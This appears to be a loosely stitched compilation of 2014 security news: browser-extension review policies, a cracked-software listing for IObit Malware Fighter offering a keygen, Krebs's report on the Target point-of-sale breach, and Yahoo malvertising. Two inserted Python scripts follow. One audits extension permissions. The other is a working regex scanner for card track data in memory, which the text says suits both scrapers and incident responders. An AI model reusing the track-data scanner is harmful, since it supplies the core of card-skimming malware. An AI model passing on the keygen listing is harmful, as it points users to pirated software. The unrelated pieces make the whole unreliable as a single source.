The company encourages extension makers to get user consent for unexpected add-on functionality, but it doesn't require it or block extensions that don't do it. Markup-based extensions can only be installed from within the browser, and therefore these must have the user's explicit consent, according to Microsoft. Other than this infrastructure, nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on). IE10 does have an add-on management window, but some add-ons, like the ad-injecting Buzzdock, have to be removed as if they are full-fledged applications.

Uninstalling a particularly invasive IE add-on.

Opera

The latest versions of Opera are able to use Chromium extensions, but unlike Chrome's, they get a review process that's similar to Firefox's. Most importantly in Opera, there are restrictions on the types of scripts an extension can run and how they handle ads. Andreas Bovens, head of developer relations at Opera Software, told Ars in an e-mail that Opera "doesn't allow extensions that include ads or tracking in content scripts, so extensions that, for example, inject ads inside webpages the user visits are not allowed." Extensions can, however, have ads in their options pages or in the pop-up that is triggered by their button in the browser's interface.

Every extension gets a review, and the review team takes special care to suss out the nature of any obfuscated JavaScript code. "If some of the code is obfuscated, reviewers ask the developers for the unobfuscated code to look at as well as a link to the obfuscation tool. That way we can check that the input and output indeed match," Bovens says. When an extension's ownership is transferred or the extension is updated, it's subject to the same rigorous review process as an extension that's being submitted for the first time, according to Bovens. An extension that goes from having no ads to injecting ads, as some Chrome extensions do, "simply would not pass [Opera's] review process," Bovens says.

Retiring to the not-so-Wild West?

While Chrome extensions may have a better ideology than those of some other browsers, the breadth and depth of functionality that Chrome extensions can have without any kind of review process means that Chrome users' trust can get taken for granted. It's similar to the Google Play app store, in that way: pretty much anything can make it to the market, but enough user complaints can get it taken down, as in the case of Add to Feedly and Tweet This Page.

Based on policy and practice, users who heavily rely on extensions or have been made wary of them by developers' recent transgressions may be safer on browsers like Firefox and Opera, where regulations are a bit stricter and there are people to police them. But there can be downsides to a vetting process, too, mainly in terms of rate-limiting iteration and improvements, so it's a matter of weighing options.

Former home? This is the current home for an awful lot of crapware add-ons, like Conduit's search hijacker, or the Ask.com toolbar that still hasn't died a thousand deaths, even though it should.

http://arstechnica.com/business/2014/01/seeking-higher-ground-after-chrome-extension-adwaremalware-problems
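The failure mode in the Add to Feedly case is an extension update that silently gains reach into every page the user visits. As an added example (not code from the article, from Google, or from any extension named above), the following Python script compares two versions of an extension's manifest.json and flags exactly that: new host permissions, content scripts newly injected into all URLs, and new API permissions. It reads the Manifest V2 "permissions" list and the Manifest V3 "host_permissions" list, which is how Chrome declares these. The two manifests are constructed for the demonstration; the extension name, version numbers and inject.js are hypothetical.

```python
"""Audit a Chrome extension update for the kind of silent behaviour change
the article describes: new host permissions, new content scripts injected
into every page, or new API permissions.

Added example for this post; it is not code from Ars Technica, Google or any
extension named above. The two manifests below are constructed for the
demonstration and do not reproduce any real extension."""

import json

# Match patterns that give an extension every page the user visits.
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def _host_patterns(manifest):
    """Host-style entries from 'permissions' (Manifest V2 mixes hosts and
    APIs in one list) and from 'host_permissions' (Manifest V3)."""
    hosts = set()
    for key in ("permissions", "host_permissions"):
        for p in manifest.get(key, []):
            if "://" in p or p == "<all_urls>":
                hosts.add(p)
    return hosts


def _content_script_matches(manifest):
    """Set of (match pattern, script file) pairs declared in content_scripts."""
    pairs = set()
    for cs in manifest.get("content_scripts", []):
        for m in cs.get("matches", []):
            for js in cs.get("js", []):
                pairs.add((m, js))
    return pairs


def audit_update(old_manifest, new_manifest):
    """Compare two manifest.json dicts (old version, new version) and return a
    list of findings about reach the new version gained into browsing."""
    findings = []

    old_hosts, new_hosts = _host_patterns(old_manifest), _host_patterns(new_manifest)
    for h in sorted(new_hosts - old_hosts):
        sev = "HIGH" if h in BROAD_PATTERNS else "MEDIUM"
        findings.append(f"{sev}: new host permission {h}")

    old_cs, new_cs = _content_script_matches(old_manifest), _content_script_matches(new_manifest)
    for m, js in sorted(new_cs - old_cs):
        sev = "HIGH" if m in BROAD_PATTERNS else "MEDIUM"
        findings.append(f"{sev}: content script {js} now injected into {m}")

    # API permissions (webRequest, cookies, history ...) that were not there before.
    old_api = set(old_manifest.get("permissions", [])) - old_hosts
    new_api = set(new_manifest.get("permissions", [])) - new_hosts
    for p in sorted(new_api - old_api):
        findings.append(f"MEDIUM: new API permission {p}")

    return findings


# Constructed sample: a single-purpose button extension before and after a
# hypothetical buyout that adds ad injection on every page.
OLD_MANIFEST = json.loads("""{
  "manifest_version": 2, "name": "Add to Example Reader", "version": "1.0",
  "permissions": ["tabs"],
  "browser_action": {"default_title": "Add to reader"}
}""")

NEW_MANIFEST = json.loads("""{
  "manifest_version": 2, "name": "Add to Example Reader", "version": "1.1",
  "permissions": ["tabs", "webRequest", "<all_urls>"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
  "browser_action": {"default_title": "Add to reader"}
}""")

if __name__ == "__main__":
    for line in audit_update(OLD_MANIFEST, NEW_MANIFEST):
        print(line)
```

Run it against the manifest.json of the installed version and the one fetched from the store (or the previous copy kept in the browser's extension directory) whenever an extension auto-updates; an extension whose only legitimate surface is a toolbar button has no business acquiring a content script on <all_urls>. The script only inspects declarations, so an extension that already held broad permissions and changed what its scripts do would need a review of the JavaScript itself, which is the part Opera's reviewers describe above.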
12. IObit Malware Fighter Pro 2.3.0.10

IObit Malware Fighter is an advanced malware and spyware removal utility that detects and removes the deepest infections, and protects your PC from potential spyware, adware, trojans, keyloggers, bots, worms, and hijackers. With the improved, unique "Dual-Core" engine and heuristic malware detection, IObit Malware Fighter detects the most complex and deepest spyware and malware quickly and efficiently.

Here are some key features of IObit Malware Fighter:

• One-click Solution and Very Easy to Use: traditional advantages of IObit products. We love simple and automatic styles.
• Complete PC Security Care: anti-malware, anti-spyware, anti-adware, anti-trojan, anti-bots, and more. IObit Malware Fighter can assist your antivirus in defending against tricky and complex threats.
• Finds the Deepest Infections: using DOG (Digital Original Gene), a novel heuristic malware detection method, IObit Malware Fighter can find the most complex threats.
• Very Fast and Light: thanks to the improved, unique "Dual-Core" anti-malware engine, complicated analysis can now be done faster.
• Works with All Antivirus Products: everyone needs qualified antivirus software, and IObit Malware Fighter will be the best mate for your current antivirus.
• Automated Working in the Background: just install it and forget it. This utility works continuously, automatically and quietly in the background on your PC. You can set it to your own schedule or just let it work automatically when your PC is idle.
• Automatic and Frequent Updates: with the new-generation malware analysis system and our professional database team, IObit Malware Fighter catches emerging dangerous malware on the Internet.

Website: http://www.iobit.com
OS: Windows XP / Vista / 7 / 8 / 8.1
Language: ML
Medicine: Keygen / Key
Size: 26,82 Mb
13. 15 Jan 14

Last weekend, Target finally disclosed at least one cause of the massive data breach that exposed personal and financial information on more than 110 million customers: malicious software that infected point-of-sale systems at Target checkout counters. Today's post includes new information about the malware apparently used in the attack, according to two sources with knowledge of the matter.

The seller of the point-of-sale memory dump malware allegedly used in the Target attack.

In an interview with CNBC on Jan. 12, Target CEO Gregg Steinhafel confirmed that the attackers stole card data by installing malicious software on point-of-sale (POS) devices in the checkout lines at Target stores. A report published by Reuters that same day stated that the Target breach involved memory-scraping malware. This type of malicious software uses a technique that parses data stored briefly in the memory banks of specific POS devices; in doing so, the malware captures the data stored on the card's magnetic stripe in the instant after it has been swiped at the terminal and is still in the system's memory. Armed with this information, thieves can create cloned copies of the cards and use them to shop in stores for high-priced merchandise. Earlier this month, US-CERT issued a detailed analysis of several common memory-scraping malware variants.

Target hasn't officially released details about the POS malware involved, nor has it said exactly how the bad guys broke into their network. Since the breach, however, at least two sources with knowledge of the ongoing investigation have independently shared information about the point-of-sale malware and some of the methods allegedly used in the attack.

BLACK POS

On Dec. 18, three days after Target became aware of the breach and the same day this blog broke the story, someone uploaded a copy of the point-of-sale malware used in the Target breach to ThreatExpert.com, a malware scanning service owned by security firm Symantec. The report generated by that scan was very recently removed, but it remains available via Google cache.

According to sources, "ttcopscli3acs" is the Windows computer name/domain used by the POS malware planted at Target stores; the username that the thieves used to log in remotely and download stolen card data was "Best1_user"; the password was "BackupU$r".

According to a source close to the investigation, that ThreatExpert.com report is related to the malware analyzed in this Symantec writeup (also published Dec. 18) for a point-of-sale malware strain that Symantec calls Reedum (note that the Windows service name of the malicious process, POSWDS, is the same as in the ThreatExpert analysis). Interestingly, a search in VirusTotal.com, a Google-owned malware scanning service, for the term "reedum" suggests that this malware has been used in previous intrusions dating back to at least June 2013; in the screenshot below left, we can see a notation added to that VirusTotal submission, "30503 POS malware from FBI."

The source close to the Target investigation said that at the time this POS malware was installed in Target's environment (sometime prior to Nov. 27, 2013), none of the 40-plus commercial antivirus tools used to scan malware at VirusTotal.com flagged the POS malware (or any related hacking tools that were used in the intrusion) as malicious. "They were customized to avoid detection and for use in specific environments," the source said.

That source and one other involved in the investigation who also asked not to be named said the POS malware appears to be nearly identical to a piece of code sold on cybercrime forums called BlackPOS, a relatively crude but effective crimeware product. BlackPOS is a specialized piece of malware designed to be installed on POS devices and record all data from credit and debit cards swiped through the infected system. According to the author of BlackPOS, an individual who uses a variety of nicknames, including Antikiller, the POS malware is roughly 207 kilobytes in size and is designed to bypass firewall software. The barebones budget version of the crimeware costs $1,800, while a more feature-rich "full" version, including options for encrypting stolen data, for example, runs $2,300.

THE ATTACK

Target has yet to honor a single request for comment from this publication, and the company has said nothing publicly about how this breach occurred. But according to sources, the attackers broke in to Target after compromising a company Web server. Somehow, the attackers were able to upload the malicious POS software to store point-of-sale machines, and then set up a control server within Target's internal network that served as a central repository for data hoovered up by all of the infected point-of-sale devices.

"The bad guys were logging in remotely to that [control server], and apparently had persistent access to it," a source close to the investigation told KrebsOnSecurity. "They basically had to keep going in and manually collecting the dumps."

It's not clear what type of software powers the point-of-sale devices running at registers in Target's U.S. stores, but multiple sources say U.S. stores have traditionally used a home-grown software called Domain Center of Excellence, which is housed on Windows XP Embedded and Windows Embedded for Point of Service (WEPOS). Target's Canadian stores run POS devices from Retalix, a company recently purchased by payment hardware giant NCR. According to sources, the Retalix POS systems will be rolled out to U.S. Target locations gradually at some point in the future.

WHO IS ANTIKILLER?

A more full-featured Breadcrumbs-level analysis of this malware author will have to wait for another day, but for now there are some clues already dug up and assembled by Russian security firm Group-IB.

Image: Securityaffairs.co

Not long after Antikiller began offering his BlackPOS crimeware for sale, Group-IB published an analysis of it, stating that customers of major US banks, such as Chase (Newark, Delaware), Capital One (Virginia, Richmond), Citibank (South Dakota), Union Bank of California (California, San Diego), Nordstrom FSB Debit (Scottsdale, Arizona), were compromised by this malware.

In his sales thread on at least one crime forum, Antikiller has posted a video of his product in action. As noted by Group-IB, there is a split second in the video where one can see a URL underneath the window being recorded by the author's screen capture software which reveals a profile at the Russian social networking site Vkontakte.ru. Group-IB goes on to link that account to a set of young Russian and Ukrainian men who appear to be actively engaged in a variety of cybercrime activities, including distributed denial-of-service (DDoS) attacks and protests associated with the hacktivist collective known as Anonymous.

One final note: Dozens of readers have asked whether I have more information on other retailers that were allegedly victimized along with Target in this scheme. According to Reuters, smaller breaches on at least three other well-known U.S. retailers took place and were conducted using similar techniques as the one on Target. Rest assured that when and if I have information about related breaches I feel confident enough about to publish, you will read about it here first.

http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware
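The memory-scraping technique described above, as an added example that is not part of the original post and not code from BlackPOS, Symantec or Target: the Python script below scans a block of memory for ISO/IEC 7813 Track 1 and Track 2 magnetic-stripe records. That pattern match is what a scraper performs against the POS process's memory in the moment after a swipe, and it is the same search an incident responder runs over a memory image or a recovered "dump" file from a control server to confirm what was taken. The memory image is constructed for the demonstration and the card numbers in it are well-known test numbers; the Luhn filter and the PAN masking are design choices of this example, not something the article attributes to the malware.

```python
"""Find magnetic-stripe track data in a block of memory, the operation a
memory-scraping POS malware performs on a POS process and the operation an
incident responder performs on a memory image or a recovered dump file.

Added example for this post; not code from KrebsOnSecurity, Symantec or the
BlackPOS author. The memory image below is constructed for the demonstration
and the card numbers in it are well-known test numbers, not real cards."""

import re

# ISO/IEC 7813 Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([A-Z0-9 /.,'-]{2,26})\^(\d{2})(\d{2})\d{3}[^?]{0,40}\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary>?  The start sentinel is
# often absent in memory, so only the PAN, separator and date are required.
TRACK2 = re.compile(rb"(?<!\d)(\d{13,19})=(\d{2})(\d{2})\d{3}\d{0,30}\??")


def luhn_ok(pan):
    """Luhn check digit (ISO/IEC 7812); filters digit runs that merely look
    like a PAN, such as counters or timestamps in the same heap."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan):
    """Display form that keeps only the first six and last four digits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_for_track_data(buf, require_luhn=True):
    """Return one record per track fragment found in buf, ordered by offset.
    With require_luhn=True, matches whose PAN fails the Luhn check are dropped,
    which keeps a scraper's output clean and keeps an analyst's report free of
    false positives."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode()
        hits.append({"track": 1, "offset": m.start(), "pan": mask(pan),
                     "name": m.group(2).decode(),
                     "expiry": f"20{m.group(3).decode()}-{m.group(4).decode()}",
                     "luhn_ok": luhn_ok(pan)})
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        hits.append({"track": 2, "offset": m.start(), "pan": mask(pan),
                     "expiry": f"20{m.group(2).decode()}-{m.group(3).decode()}",
                     "luhn_ok": luhn_ok(pan)})
    if require_luhn:
        hits = [h for h in hits if h["luhn_ok"]]
    return sorted(hits, key=lambda h: h["offset"])


# Constructed "process heap": filler bytes, one Track 1 record, one Track 2
# record, and a Track 2-shaped decoy whose PAN fails the Luhn check.
SAMPLE_MEMORY = (
    b"\x00\x10heap chunk 0x41\x00\x00counter=00001234\x00"
    b"%B4111111111111111^DOE/JANE^25121010000000000?\x00\x00"
    b"log: item 7 scanned\x00;5500000000000004=25121011234567890?\x00"
    b"1234567890123456=2512101?\x00\x00"
)

if __name__ == "__main__":
    for h in scan_for_track_data(SAMPLE_MEMORY):
        print(h)
    # With require_luhn=False the decoy is returned too, flagged luhn_ok=False.
```

Run against a raw memory image, the script reports two records and silently drops the decoy. Note what this implies for defence: the data is only in the clear in the POS process's memory for the instant the article describes, so this is the window a scraper targets, and end-to-end encryption at the reader (before the data reaches that process) is what removes it. For the responder, matching the same regular expressions against files found on the internal control server is a quick way to confirm that what was being collected was track data rather than, say, the stated "customised" tooling.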
  14. By Shona Ghosh Posted on 9 Jan 2014 at 15:21 Millions of PCs may have been infected by malware inserted into ads on Yahoo websites - and then used to mine bitcoins. Yahoo confirmed this week that hackers had managed to insert malware into ads displayed on some of its European sites, but hasn't said how many users have been affected. Security company Light Cyber estimates that several million PCs have been infected, and found the malware had been used to install Bitcoin-mining software on some machines. Separate estimates this week from security firm Fox-IT suggest the UK has one of the highest numbers of affected users. Light Cyber founder and vice president for product and strategy, Giora Engel, said the hackers were potentially building a huge network of Bitcoin-mining PCs, since the task is too labour intensive for one machine. He added that the malware had delivered other tools that gave hackers control over infected PCs. "This campaign downloaded a variety of different tools - some were malware to enable attackers to control each infected PC and steal passwords," he told PC Pro. "Other tools were more specific – the Bitcoin mining tool is not malware itself, it's something anyone can download and generate Bitcoin." Engel estimated that, with several million machines at their disposal, the hackers could be making $10,000 (approximately £6,000) a day. Security companies have said the number of Bitcoin-related attacks will rise this year, after the virtual currency shot up in value. One Bitcoin is currently worth around £500, though its value fluctuates. http://www.pcpro.co.uk/news/security/386452/yahoo-malware-turns-millions-of-pcs-into-bitcoin-network